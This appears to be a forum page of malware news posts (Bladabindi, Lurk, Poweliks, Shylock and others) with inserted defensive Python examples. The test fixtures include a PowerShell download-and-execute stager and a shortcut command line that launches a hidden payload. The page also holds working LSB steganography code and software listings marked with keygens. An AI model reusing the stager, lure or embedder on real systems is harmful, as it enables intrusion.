Showing results for tags 'Malware'.
  1. Cyber security sleuths have alerted Indian Internet users against hacking attempts by a clandestine multi-identity virus, Bladabindi, which steals a user's sensitive personal information for nefarious purposes. The virus, the Computer Emergency Response Team-India (CERT-In) said, could infect the "Microsoft Windows operating system" and spreads through removable USB flash drives, popularly known as pendrives and data cards, and via other malware. CERT-In is the nodal national agency to combat hacking and phishing and to fortify the security-related defences of the Indian Internet domain.
"It has been reported that variants of malware called Bladabindi are spreading. This malware steals sensitive user information from infected computer systems. Bladabindi could also be used as a malware downloader to propagate further malware and provide backdoor access to the remote attacker. Some of the Bladabindi variants could capture keyboard presses, control the computer camera and later send collected sensitive information to the remote attacker. Bladabindi is infecting Microsoft Windows operating systems and spreading via infecting removable USB flash drives and via other malware," the latest advisory by the agency said.
The threat potential of the malware can be gauged from the fact that it can acquire as many as 12 aliases to conceal its real identity before affecting a computer system or a user's personal information. "Bladabindi variants can be created using a publicly available malicious hacker tool. An attacker can create a malicious file using any choice of icon to mislead or entice a naive user into running the malicious file," the advisory said. The virus possesses a unique ability to acquire a safe network domain id in order to falsely add itself to the firewall exclusion list and bypass a user's firewall mechanism.
A typical Bladabindi variant propagates by copying itself into the root folder of a removable drive and creating a shortcut file with the name and folder icon of the drive. When the user clicks on the shortcut, the malware is executed and Windows Explorer is opened, making it seem as if nothing malicious happened. A potential attack by the virus could result in the loss of important proprietary data of a user such as "computer name, country and serial number, Windows user name, computer's operating system version, Chrome stored passwords, Firefox stored passwords," the agency said in the advisory.
"The malware can also use the infected computer's camera to record and steal personal information. It checks for camera drivers and installs a DLL plugin so it can record and upload the video to a remote attacker. The malware can also log or capture keystrokes to steal credentials like user names and passwords," CERT-In cautioned users.
The agency has also suggested some countermeasures against Bladabindi. "Scan the computer system with the free removal tools, disable the autorun functionality in Windows, use USB clean or vaccination software, keep up-to-date patches and fixes on the operating system and application software, deploy up-to-date anti-virus and anti-spyware signatures at desktop and gateway level," the agency suggested. It also recommended that users should not follow unsolicited web links or attachments in email messages, not visit untrusted websites, use strong passwords and enable password policies, enable a firewall at desktop and gateway level, guard against social engineering attacks and limit user privileges.
Source: http://www.financialexpress.com/news/hacking-virus-bladabindi-prowling-in-india-targets-microsoft-windows-os/1273299/0
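The USB propagation CERT-In describes (a .lnk in the drive root carrying a folder's name and icon, which runs the payload and then opens Explorer) can be checked for without executing anything on the drive. The following is an added example and is not CERT-In's code or any vendor's tool: it builds a constructed shell link in memory following the MS-SHLLINK layout (76-byte header plus StringData, no IDList or LinkInfo), parses it back, and flags shortcuts whose name or icon mimics a folder while their command line launches something other than Explorer. The drive listing, the volume label "KINGSTON" and the payload path hidden\drive.exe are made up for the demonstration.

```python
"""Flag folder-lookalike .lnk lures in a removable-drive root.

Added example, not CERT-In's or any vendor's code. The shell link below is
constructed in memory following the MS-SHLLINK layout (header + StringData,
no IDList/LinkInfo); the drive listing and payload path are made up.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
# StringData fields in the order they appear in the file, with their LinkFlags bit
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]
IS_UNICODE = 0x80
HEADER_FMT = "<I16sIIQQQIiIHHII"  # 76-byte ShellLinkHeader
SW_SHOWMINNOACTIVE = 7            # lures start minimized so the console window is not noticed
EXEC_RE = re.compile(r"(?i)\b(?:cmd|wscript|cscript|rundll32|powershell|mshta|"
                     r"[\w-]+\.(?:exe|scr|com|bat|vbs|js))\b")


def build_lnk(strings, icon_index=0, show=SW_SHOWMINNOACTIVE):
    """Constructed minimal shell link carrying only the given StringData fields."""
    flags, body = IS_UNICODE, b""
    for key, bit in STRING_FIELDS:
        if key in strings:
            flags |= bit
            body += struct.pack("<H", len(strings[key])) + strings[key].encode("utf-16-le")
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, show, 0, 0, 0, 0)
    return header + body


def parse_lnk(data):
    """Return StringData plus icon index and show command; skips IDList and LinkInfo."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    link = {"icon_index": struct.unpack_from("<i", data, 56)[0],
            "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize excludes itself
    if flags & HAS_LINKINFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    for key, bit in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            link[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
            pos += count * width
    return link


def launches_non_explorer(cmdline):
    """True if the command line names an interpreter or program other than explorer."""
    return any(not m.group(0).lower().startswith("explorer") for m in EXEC_RE.finditer(cmdline))


def find_lure_shortcuts(listing, volume_label):
    """listing maps root entry names to .lnk bytes, or None for a directory."""
    dirs = {name.lower() for name, content in listing.items() if content is None}
    hits = []
    for name, content in listing.items():
        if content is None or not name.lower().endswith(".lnk"):
            continue
        try:
            link = parse_lnk(content)
        except ValueError:
            continue
        stem = name[:-4].lower()
        looks_like_folder = (stem in dirs or stem == volume_label.lower()
                             or "shell32.dll" in link.get("icon_location", "").lower())
        cmdline = link.get("relative_path", "") + " " + link.get("arguments", "")
        if looks_like_folder and launches_non_explorer(cmdline):
            hits.append(name)
    return hits


# Constructed listing of a drive root: a real "Photos" folder beside a lure named after it
SAMPLE_DRIVE = {
    "Photos": None,
    "Photos.lnk": build_lnk({
        "relative_path": "..\\..\\Windows\\System32\\cmd.exe",
        "arguments": "/c start hidden\\drive.exe & start explorer Photos & exit",
        "icon_location": "%SystemRoot%\\system32\\shell32.dll"}, icon_index=3),
    "notes.txt.lnk": build_lnk({"relative_path": "notes.txt"}, show=1),
}

if __name__ == "__main__":
    print(find_lure_shortcuts(SAMPLE_DRIVE, "KINGSTON"))  # ['Photos.lnk']
```

On a real drive the bytes would come from reading each *.lnk in the root and the directory names from os.listdir; the heuristic is deliberately narrow (folder lookalike plus a non-Explorer launch) so that ordinary document shortcuts are not reported.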
  2. GridinSoft Trojan Killer 2.2.3.9
GridinSoft Trojan Killer - an advanced program to clean your computer of all malicious threats! If you are a regular internet user, you should take steps to protect your personal information against cyber-criminals. Trojan Killer can help you in this matter! The program quickly identifies (recognizes) and immediately removes dangerous malicious Trojans - spyware and adware, malware that blocks and restricts the activities of tools, keyloggers, etc. - before irreversible painful events arrive in the form of stolen accounts, passwords, credit card numbers, and personal, corporate and other information. Trojan Killer is designed specifically to disable / remove malware without the user having to manually edit system files or the registry. The program also removes the additional system modifications that are ignored by some standard antivirus scanners. Trojan Killer scans ALL the files loaded at boot time for Adware, Spyware, Remote Access Trojans, Internet Worms and other malware. Trojan Killer works within a security system to provide security for computer systems. The program will help you get rid of annoying adware, malware and other rough tools. It is very important to restore control over your computer, and not let anyone use your data.
Additional tools:
Reset Internet Explorer Home / Start / Search Page settings. Some malware programs make changes to Internet Explorer's Home Page, Start and Search Page settings in order to redirect the web browser to different websites. This utility will reset the Home / Start / Search pages to the standard defaults. You can then manually reset your Home Page to your website of choice (or leave it "blank", the default).
Restore the HOSTS file. The Windows HOSTS file is a text file which stores website addresses. The file can be used to speed up access to websites you visit often - by equating the website name to its DNS address, the web browser can find the website more quickly as it does not have to query a DNS name server. Some malware programs add entries to this file, either to deny access to websites (usually security-related websites or antivirus companies) or to redirect access to websites of their choosing.
Reset Windows Update policies. Some malware programs attempt to prevent Windows Update from running, and inhibit access to resetting Windows Update by blanking out the Windows Update options on the Configure Update page.
Website: http://www.gridinsoft.com OS: Windows XP / Vista / 7 / 8 Language: ML Medicine: Patch / Keymaker Size: 46,00 Mb.
  3. Researchers have discovered click fraud malware designed to “hide in plain sight” and evade traditional security tools by embedding data into an image file. Lurk is a downloader which uses digital steganography – the art of hiding information in images, audio or video files, according to a Dell SecureWorks Counter Threat Unit (CTU) Threat Intelligence paper by Brett Stone-Gross. “Lurk specifically uses an algorithm that can embed encrypted URLs into an image file by inconspicuously manipulating individual pixels. The resulting image contains additional data that is virtually invisible to an observer,” he wrote. “It is unlikely that existing IPS/IDS devices could detect data that is concealed with digital steganography. As a result, Lurk may be able to evade network defenses and hide in plain sight.” Lurk is comprised of two parts – a dropper DLL and a payload DLL, with the former’s main job being to extract and load the latter, he added. Once the main payload DLL executes, it checks the victim computer for 52 different security products and apparently won’t install if it discovers one of 21 specific products. “Steganography can make it exceedingly difficult to detect the presence of hidden information such as a configuration file, binary update, or bot command, especially in digital files,” concluded Stone-Gross. “As a result, the use of steganography in malware may become more prevalent in the future.” Source
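What Stone-Gross describes (URLs embedded by manipulating individual pixels, so that the data is invisible to an observer and to byte-matching IPS/IDS signatures) is least-significant-bit steganography. The following is an added example, not SecureWorks' or Lurk's code: it hides a payload one bit per colour byte in a constructed 24-bit raster, recovers it, and checks that no carrier byte moved by more than one level. The SHA-256 keystream standing in for Lurk's unspecified cipher, the gradient raster and the URL are assumptions made for the demonstration.

```python
"""LSB steganography of the kind the CTU paper attributes to Lurk.

Added example, not SecureWorks' or Lurk's code. The carrier is a constructed
24-bit raster (bytes, 3 per pixel) and the keystream is a stand-in cipher.
"""
import hashlib

LENGTH_BITS = 32  # big-endian payload length written first, so the reader knows how much to pull


def keystream_xor(data, key):
    """Toy stream cipher (assumption, not Lurk's): XOR with SHA-256 counter blocks."""
    stream = b"".join(hashlib.sha256(key + n.to_bytes(4, "big")).digest()
                      for n in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))


def _bits(data):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def _read_bits(raster, start, count):
    value = 0
    for i in range(start, start + count):
        value = (value << 1) | (raster[i] & 1)
    return value


def embed(raster, payload):
    """Copy raster with the length-prefixed payload in the LSB of successive bytes."""
    framed = len(payload).to_bytes(LENGTH_BITS // 8, "big") + payload
    if len(framed) * 8 > len(raster):
        raise ValueError("carrier too small for payload")
    out = bytearray(raster)
    for i, bit in enumerate(_bits(framed)):
        out[i] = (out[i] & 0xFE) | bit   # each carrier byte changes by at most 1
    return bytes(out)


def extract(raster):
    """Read the length prefix, then that many bytes, from the LSBs."""
    length = _read_bits(raster, 0, LENGTH_BITS)
    if LENGTH_BITS + length * 8 > len(raster):
        raise ValueError("declared length exceeds carrier")
    return bytes(_read_bits(raster, LENGTH_BITS + 8 * j, 8) for j in range(length))


def max_byte_delta(a, b):
    """Largest per-byte change between cover and stego image."""
    return max(abs(x - y) for x, y in zip(a, b))


def make_raster(width, height):
    """Constructed gradient image, 3 bytes per pixel (stand-in for decoded PNG/BMP data)."""
    return bytes((x * 7 + y * 3 + c * 11) & 0xFF
                 for y in range(height) for x in range(width) for c in range(3))


def demo(url=b"http://cfg.example.invalid/update.bin", key=b"constructed-key"):
    """Hide an encrypted URL in a 64x64 cover, recover it, and measure the pixel change."""
    cover = make_raster(64, 64)
    stego = embed(cover, keystream_xor(url, key))
    recovered = keystream_xor(extract(stego), key)
    return recovered, max_byte_delta(cover, stego)


if __name__ == "__main__":
    print(demo())
```

The point for network defenders is visible in embed(): the URL never appears as a contiguous byte string in the image, only as the low bit of every byte, so a signature on the URL or on the encrypted blob finds nothing; detection has to come from statistical steganalysis of the pixel data or from the downloader's behaviour on the host.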
  4. Like most profitable criminal enterprises, the Shylock banking malware thrived because it was supported by a nimble infrastructure that allowed it to stay one step ahead of network and security monitoring capabilities, and the authorities. That race ended this week. Europol announced today that it, along with numerous law enforcement and industry partners, had carried out a successful takedown of the Shylock infrastructure. The two-day culmination of the operation took place on Tuesday and Wednesday and was coordinated by the U.K.'s National Crime Agency and supported by Europol, the FBI, GCHQ in the U.K., and industry companies including Kaspersky Lab, BAE Systems Applied Intelligence and Dell SecureWorks. “Law enforcement agencies took action to disrupt the system which Shylock depends on to operate effectively,” Europol said in a statement. “This comprised the seizure of servers which form the command and control system for the Trojan, as well as taking control of the domains Shylock uses for communication between infected computers.” Few details were provided on the location of the command and control infrastructure, but Europol said it coordinated investigative actions with cooperation from authorities in Italy, the Netherlands, Turkey, Germany, France and Poland. CERT-EU, Europol said, was also instrumental in providing data on the malicious domains used by Shylock. No arrests were announced, though Europol said that previously unknown parts of the Shylock infrastructure were uncovered and additional law enforcement action may be upcoming. “It has been a pleasure for me to see the international cooperation between police officers and prosecutors from many countries, and we have again tested our improved ability to rapidly react to cyber threats in or outside the EU,” said Troels Oerting, head of the European Cybercrime Center at Europol. “It's another step in the right direction for law enforcement and prosecutors in the EU and I thank all involved for their huge commitment and dedication.”
Major takedowns of botnets and other cybercrime operations are quickly becoming commonplace. Though usually not a permanent solution, takedowns such as this one and the recent Gameover Zeus takedown, which also impacted the Cryptolocker infrastructure, indicate improving cooperation between international law enforcement. “The NCA is coordinating an international response to a cybercrime threat to businesses and individuals around the world,” said Andy Archibald, Deputy Director of the NCA's National Cyber Crime Unit in the U.K. “This phase of activity is intended to have a significant effect on the Shylock infrastructure, and demonstrates how we are using partnerships across sectors and across national boundaries to cut cybercrime.” Shylock, like Zeus, targeted banking credentials. Victims were usually tricked or lured into clicking on a malicious link that infected computers with the Trojan. Shylock surfaced in 2011 and at first was limited to the U.K., but quickly expanded into a global operation concentrating on victims in Europe and the United States. Online banking customers were victimized by Shylock's man-in-the-browser style attacks against a predetermined list of as many as 60 banks. The Trojan would sniff out banking credentials and loot accounts. “Banking fraud campaigns are no longer one-off cases. We've seen a significant rise in these kinds of malicious operations,” said Sergey Golovanov, Principal Security Researcher at Kaspersky Lab. “To fight cybercrime, we provide threat intelligence to law enforcement agencies all over the world and cooperate with international organizations such as Europol. Global action brings positive results – an example being the operation targeting Shylock malware.” Golovanov said in 2013 the number of cyberattacks involving malware designed to steal financial data increased by 27.6 percent to reach 28.4 million.
The attackers behind Shylock were also careful to hide their tracks. Like other similar malware, such as versions of PushDo, Zeus and TDL/TDSS, Shylock made good use of a domain generation algorithm to send stolen data back to the attackers. The DGA feature sidestepped detection and research efforts effectively, experts said. One version of Shylock that surfaced in January 2013 was capable of spreading through Skype, in addition to network shares and even removable USB drives. Ultimately, Shylock could also steal browser cookies, use web injects on infected browsers and download and execute files on compromised machines. This article was updated at 12:15 p.m. ET with comments from Kaspersky Lab.
Source
  5. Cybercriminals always look for the weakest link they can leverage to make as many victims as possible, and it looks like web browsers with out-of-date plugins are the norm in Europe.
Browser plugin update situation in Europe
According to the latest statistics from the Germany-based Cyscon GmbH, a company specializing in detecting and mitigating cyber threats, the users of most countries in Europe rely on poorly updated web browsers to explore the online world, which translates into plenty of possible victims for the crooks. The company makes available an interactive map that shows, in percentage, the proportion of a country's users that do not rely on a browser whose integrated plugin components are updated with the latest patches available. According to Cyscon's statistics at the time of writing, the European country whose users are most aware of the security risks posed by out-of-date web browsing software is the Netherlands, where 51% of the computer users have at least one plugin component in the browser that needs to be updated. Although this is an alarming value, the country whose users would be most prone to falling victim to a cybercriminal is Croatia, where it appears that 97% of the users contributing to Cyscon's statistics do not have all the updates for said components installed. It is followed by the Republic of Moldova, with 94%, Serbia with 86% and Germany with 80%. As shown by these statistics, there is no country with users sufficiently aware of the risk posed by an old component with security glitches to report an outdated-plugin rate lower than 50%.
Source
  6. ViRobot APT Shield 2.0 is the best PC security program to block attacks on vulnerabilities (including zero-day vulnerabilities and drive-by download vulnerabilities) in applications and the Windows OS (including Windows XP) in advance, and it is compatible with anti-malware programs. Especially, ViRobot APT Shield 2.0 will be the best choice for PCs which cannot be upgraded from Windows XP to a higher version of Windows.
Features: 1. Response to a variety of attacks on application vulnerabilities. It blocks attacks that use vulnerabilities in applications such as document programs (MS Office, Adobe Reader, ...), web browsers (IE, Firefox, Chrome, ...), media players, messengers, compression software, etc. 2. Blocking vulnerabilities left by the end of Windows XP support. It prevents attacks that use vulnerabilities in versions of Windows to which security patches can no longer be applied. 3. Complementing the limits of signature-based anti-virus. Using behaviour-based technology, it blocks the creation and execution of malicious code that exploits vulnerabilities, and it does not need pattern updates. 4. Blocking document leaks aimed at many unspecified targets. Recently, malicious code has used social engineering to exfiltrate important documents from companies, but this product blocks it completely. 5. Handling systems on which Windows security patches are difficult to apply. It is a very light product that requires only minimal hardware resources, and so is suitable for enterprise environments where updating Windows security patches is difficult.
Functions: 1. Enhanced detection of malicious code. It can block zero-day attacks in advance. There is no need to worry about false positives, because it detects abnormal behaviour of applications. It can detect malicious code in real time. 2. Flexible scalability and low cost. It is compatible with anti-malware products from around the world, which ensures flexible scalability, and it can save cost compared to network-based detection solutions (no extra charge beyond the licence fee). 3. Management efficiency. Security systems can be controlled by connection with integrated log equipment (e.g. ESM). A monitoring service is provided through installation of a web log server. 4. Usability. No pattern updates are required. Installation is simple (it takes less than 10 seconds). The portion of end users' direct control is minimized. It uses minimal resources (e.g. memory usage of less than 10 MB).
Screenshots: Blocking malicious code that exploits vulnerabilities in applications. Document programs: MS Office, Adobe Reader, Ichitaro, etc. Web browsers: IE, Firefox, Chrome, Safari, Opera, Java, Flash, ActiveX, etc. Media players: RealPlayer, QuickTime Player, Winamp, etc. Messengers: Skype, Yahoo, Google, etc. Compression software: WinZip, WinRAR, 7-Zip, etc.
Homepage: http://www.aptshield.net/ Download link: http://www.aptshield.net/apt_individual_download.html Requirements: CPU: Intel Pentium III 500MHz or above. RAM: 512 MB or above. HDD: free space of more than 500 MB. OS: Windows XP / Windows Vista / Windows 7 / Windows 8 / Windows Server 2003 / Windows Server 2008 / Windows Server 2012, x86 and x64.
  7. A new remote administration Trojan (RAT) receives command and control instructions through Yahoo Mail, and could be easily modified to communicate with its authors through Gmail or other popular webmail providers. This new RAT's significance stems primarily from its ability to elude the notice of intrusion detection systems by operating over seemingly benign domains. According to an analysis written by Paul Rascagnères of the German security firm G-Data and published by Virus Bulletin, RATs generally transmit the information they steal from victimized machines over a specified port, or by regularly connecting to a remote server. Each of these behaviors is a well-known flag that is likely to trigger detection on corporate networks. This RAT, known as IcoScript, has gone largely undetected since 2012. Part of the reason, Rascagnères explains, is that access to webmail services is rarely blocked or blacklisted in corporate environments and such traffic is very unlikely to be considered suspicious. IcoScript makes use of Component Object Model technology in Microsoft Windows, making HTTP requests to remote services through Internet Explorer. Another of its novelties is that it appears to use its own uniquely tailored scripting language to perform various tasks. In the sample analyzed by G-Data, IcoScript connected to a Yahoo Mail account controlled by its authors. The authors manipulate the malware by sending specially crafted emails containing coded instructions. “Moreover,” Rascagnères writes, “the modular nature of the malware makes it very easy for the attackers to switch to another webmail service, such as Gmail, or even to use services like Facebook or LinkedIn to control the malware while running a low risk of the communication being blocked.”
Incident response teams generally contain malware like this, Rascagnères claims, by blocking the URL on the proxy. However, in the case of IcoScript, these URLs are not easily blocked, because they originate from the servers of a trusted service. The efficacy of IcoScript is likely to increase if the attackers diversify the sources of their command and control, configuring samples of the malware to use any number of legitimate webmail providers, social networking sites, and cloud storage services. “The containment must be performed on the network flow in real time,” Rascagnères concludes. “This approach is harder to realize and to maintain. It demonstrates both that attackers know how incident response teams work, and that they can adapt their communication to make detection and containment both complicated and expensive.”
Source
  8. A new form of persistent malware has been discovered, one which does not create any file on the disk and stores all activities in the registry. In a blog posted at the end of July, security researcher Paul Rascagneres of GData details the particularities of the new type of malware, dubbed Poweliks, whose methods he labels as “rather rare and new,” since everything is performed in the memory of the computer system and there are several layers of code to get through in order to avoid analysis. The attack vector is an email with a maliciously crafted Microsoft Word document attached. The vulnerability leveraged by the attackers is CVE-2012-0158, which affects Office and several other Microsoft products. It is not new, but many users are still using old versions of the software that could be compromised. Once the file is launched, the cybercriminals turn on the persistence feature of the malware by creating an encoded autostart key in the registry. It seems that the encoding technique used by the malware was originally created by Microsoft to safeguard its source code from being altered. In order to avoid detection by system tools, the registry key is hidden by giving it a name in non-ASCII characters, which makes it unavailable to the Registry Editor (regedit.exe) in Windows. By creating the auto-start key, the attackers make sure that a reboot of the system does not remove it from the computer. By decoding the key, Rascagneres observed two sets of code: one that verified whether the affected machine had Windows PowerShell installed, and another, a Base64-encoded PowerShell script, for calling and executing the shellcode. According to the researcher, the shellcode executes the payload, which attempts to connect to a remote command and control (C&C) server to receive instructions. There are multiple IP addresses for C&C servers, all hard-coded.
The peculiarity of this malware is that it does not create any file on the disk, making it more difficult to detect through classic protection mechanisms. “To prevent attacks like this, AV solutions have to either catch the file (the initial Word document) before it is executed (if there is one), preferably before it reached the customer's email inbox. Or, as a next line of defense, they need to detect the software exploit after the file's execution, or, as a last step, in-registry surveillance has to detect unusual behavior, block the corresponding processes and alert the user,” writes Rascagneres. This type of malicious behavior is not new though, as a sample was also analyzed on KernelMode.info in mid-July this year. In that case, the same vulnerability was exploited through a malicious RTF attached to an email claiming to be from Canada Post and/or the USPS mail service.
Source: http://news.softpedia.com/news/Registry-Residing-Malware-Creates-No-File-for-Antivirus-To-Scan-453374.shtml#
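The persistence Rascagneres describes (an autostart value whose name regedit cannot display, carrying encoded code that checks for PowerShell and runs a Base64 PowerShell stage) suggests what the "in-registry surveillance" he calls for should look at. The following is an added example, not GData's code and not Poweliks' actual encoding: it triages (value name, value data) pairs from a Run key, flags names containing non-printable or non-ASCII characters, decodes a `powershell -EncodedCommand` payload (Base64 of UTF-16LE) and reports download-and-execute keywords in the decoded script. The Run-key entries, the zero-width-space value name and the stager URL are constructed for the demonstration.

```python
"""Triage Run-key values for Poweliks-style encoded PowerShell persistence.

Added example, not GData's code and not Poweliks' own encoding. It works on
(value name, value data) pairs so it runs offline on the constructed sample;
on a live host the pairs would come from winreg or an offline hive parser.
"""
import base64
import binascii
import re

# 'powershell [...] -e|-ec|-enc|-encodedcommand <base64>'; '-ep' (ExecutionPolicy) does not match
ENC_RE = re.compile(r"(?i)\bpowershell(?:\.exe)?\b.*?\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
STAGER_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|"
                       r"frombase64string|virtualalloc|start-process)\b")


def decode_encoded_command(data):
    """Return the script carried by '-EncodedCommand' (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return "<undecodable payload>"


def odd_value_name(name):
    """Names regedit shows badly: empty, blank, or containing non-printable/non-ASCII characters."""
    return name.strip() == "" or any(not 32 <= ord(c) <= 126 for c in name)


def triage(entries):
    """entries: iterable of (value name, value data). Returns one finding per suspicious value."""
    findings = []
    for name, data in entries:
        reasons = []
        if odd_value_name(name):
            reasons.append("value name is empty or contains non-printable characters")
        script = decode_encoded_command(data)
        if script is not None:
            reasons.append("launches powershell with an encoded command")
            if STAGER_RE.search(script):
                reasons.append("decoded script downloads or executes further code")
        if reasons:
            findings.append({"name": name, "data": data, "reasons": reasons, "script": script})
    return findings


# Constructed HKCU\...\Run values; the second mimics the pattern in the post (odd name,
# encoded PowerShell stage that fetches more code). The URL uses a TEST-NET-2 address.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2')"
AUTORUN_SAMPLE = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("\u200b", "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -enc "
               + base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")),
    ("Updater", r'"C:\Program Files\Vendor\updater.exe" /silent'),
]

if __name__ == "__main__":
    for finding in triage(AUTORUN_SAMPLE):
        print(repr(finding["name"]), finding["reasons"])
        print("  decoded:", finding["script"])
```

On a live Windows host the pairs can be enumerated with winreg.EnumValue over the HKCU and HKLM ...\CurrentVersion\Run keys. The name check runs independently of the data check on purpose: as the post notes, a value that regedit refuses to display is a finding in itself, even before the payload is decoded.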
  9. A new Remote Administration Tool for Google's Android platform has become available in the darkest corners of the Internet. This particular type of tool is bundled into a malware package that has the ability to claim control of the devices of those who use an app that has been infected, effectively turning the unwitting smartphone or tablet into a spyware zombie. The latest addition to the arsenal of the unscrupulous goes by the name of "Dendroid" and is being sold on the underground market for as little as $300. A tool like this would normally pass by unnoticed, but Dendroid differs from others in the fact that it offers unlimited usage for the relatively small amount of money an individual has to part with. It also comes bundled with the unnerving ability to hide amongst legitimate apps on the Play Store without being detected by Google's malware scanning abilities.
The scary stuff begins when a user – who is none the wiser – installs an infected app onto their Android smartphone or tablet. The individual(s) responsible for infecting the app in the first place have the ability to gain remote access to the device and effectively take control of the hardware. This level of remote access would allow undetected access to photographs, stored data and message archives that are on the device. Perhaps more terrifying, it would also grant access to the microphone and camera modules. A number of researchers from Lookout Security have taken the time to look into Dendroid, and are surprised by the methods its developers have implemented purely to evade detection by Bouncer, Google's malware detection software. It looks as if Dendroid was designed with evading Play Store security in mind. Amongst its numerous features, Dendroid has some relatively simple — yet unusual — anti-emulation detection code that helps it evade detection by Bouncer, Google's anti-malware screening system for the Play Store.
The introduction and availability of this latest sophisticated Remote Administration Tool further brings attention to the fact that the Android platform is relatively easy pickings for malicious types who are serious about embarking on malware activity. It seems that the market for these types of tools is so lucrative, and is becoming so commonplace, that security researchers involved in the field have furnished the software with the abbreviated name "RAT". The Android platform is now responsible for a staggering 92% of all known malware on mobile platforms, up from 47% two years ago. The question is, what will Google do about this, if anything?
Source
  10. IObit Malware Fighter Pro 2.3.0.16
IObit Malware Fighter is an advanced malware & spyware removal utility that detects and removes the deepest infections, and protects your PC from various potential spyware, adware, trojans, keyloggers, bots, worms, and hijackers. With the improved, unique "Dual-Core" engine and heuristic malware detection, IObit Malware Fighter detects the most complex and deepest spyware and malware in a very fast and efficient way.
Here are some key features of IObit Malware Fighter:
One-click Solution and Very Easy to Use: Traditional advantages of IObit products. We love simple and automatic styles.
Complete PC Security Care: Anti-malware, anti-spyware, anti-adware, anti-trojan, anti-bots, and more. IObit Malware Fighter can assist your antivirus to defend against any tricky and complex threats.
Finds the Deepest Infections: Using DOG (Digital Original Gene), a novel heuristic malware detection method, IObit Malware Fighter can find the most complex threats.
Very Fast and Light: Thanks to the improved, unique "Dual-Core" anti-malware engine, complicated analysis can be made faster now.
Works with All Antivirus Products: Everyone needs qualified antivirus software, and IObit Malware Fighter will surely be the best mate for your current antivirus.
Automated Working in the Background: Just install it and forget it. This powerful utility works continuously, automatically and quietly in the background on your PC. You can set it to your schedule or just let it work automatically when your PC is idle.
Automatic and Frequent Updates: With the new-generation malware analysis system and our professional database team, IObit Malware Fighter catches emerging dangerous malware on the Internet.
Website: http://www.iobit.com OS: Windows XP / Vista / 7 / 8 / 8.1 Language: ML Medicine: Keygen / Key Size: 26,62 Mb.
11. By Casey Johnston - Jan 28 2014, 7:00am AUSEST

Updates turned some Chrome add-ons malicious; not all browsers allow that.

Customers complain about activity tracking in CRXMouse on Chrome, a particularly invasive add-on.

In a recent revelation by OMG Chrome and the developer of the Chrome extension Add to Feedly, it came to light that Chrome extensions are capable of changing service or ownership under a user's nose without much notification. In the case of Add to Feedly, a buyout meant thousands of users were suddenly subjected to injected adware and redirected links.

Chrome's regulations for existing extensions are set to change in June 2014. The changes should prevent extensions from being anything but simple and single-purpose in nature, with a single visible UI surface in Chrome and a single browser action or page action button, like the extensions made by Pinterest or OneTab. This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June.

Given how Chrome's system of updates, design restrictions, and ownership seemed to have gotten ahead of itself, we decided to take a look at the policies of other browsers to see if their extensions could be subjected to a similar fate. While Chrome isn't the only browser where an Add To Feedly tale could be spun, it seems to be the most likely place for such an outcome.

Firefox

Mozilla's Firefox differs from Chrome in that it has an involved review system for all extensions that go from developers to the front-end store. Reviewers will reject an extension if it violates any of the rules in Firefox's extension development documents. One of these rules is "no surprises": an add-on can't do anything it doesn't disclose to users, and existing add-ons can't change their functionality without notifying the user and getting their permission.

Firefox puts add-ons with unexpected features, like advertising that supports the add-on financially, into a separate category. Users have to explicitly opt in to these features, says Jonathan Nightingale, vice president of Firefox. This means that in these cases, users will see a screen offering them the additional features, says Nightingale. One example is FastestFox, which pops a tab at first install asking the user to enable ad injection from Superfish.

It's how developers implement these opt-in screens that could provide a possible loophole: the addition of advertising might be obscurable by language, and data tracking could be, too (it's permitted under Firefox's rules, but it must be disclosed in a privacy policy). Still, the review policy and the need for opt-in for these more pernicious features both help prevent users from having new functionality sprung on them.

Safari

Safari has extensive design documents for its extensions but no central clearinghouse for them like other browsers. Apple keeps a gallery of a chosen few extensions that must meet certain regulations, but these represent a small fraction of the extensions available. Data tracking of an extension's users is possible, per the design docs, as is ad manipulation. Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user. There are no regulations for disclosing functionality changes or changes of ownership, however.

Internet Explorer

Microsoft's browser absolves itself of responsibility for add-ons on a support page where it states, "While add-ons can make your browsing experience better by giving you access to great Web content, some add-ons can pose security, privacy, or performance risks. Make sure any add-ons you install are from a trusted source." Add on at your own risk. Like Apple, Microsoft maintains an exclusive gallery of vetted add-ons.

